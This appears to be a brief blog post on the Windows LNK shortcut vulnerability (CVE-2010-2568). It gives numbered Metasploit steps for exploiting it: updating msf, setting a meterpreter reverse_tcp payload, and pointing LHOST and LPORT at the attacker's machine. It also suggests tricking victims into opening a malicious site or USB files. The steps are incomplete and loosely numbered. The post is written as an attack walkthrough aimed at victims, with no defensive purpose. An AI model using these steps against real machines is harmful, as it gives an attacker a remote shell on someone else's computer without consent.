Posts tagged CVE-2010-2568)
Recently there has been detected a new 0 day exploit which takes advantage of Windows incorrectly parses shortcuts so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. this can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV.Recently metasploit have pushed the exploit to the msf module.still there is no patch relased for this vulnerability.
there are 2 ways to exploit this
1)keep these 2 files LNK file and the DLL in the USb stick and run on the victim machine
2)or trick the victim in accessing the maclicious site.
we will use 2 nd method .
3)svn update (update ur msf)
4)set payload windows/meterpreter/reverse_tcp
5)set LHOST 192.168.0.103 (your ip)
6)set LPORT 1427 (any port)
chk out my video to accomplish the above method Exploiting Windows LNK vulnerability (CVE-2010-2568)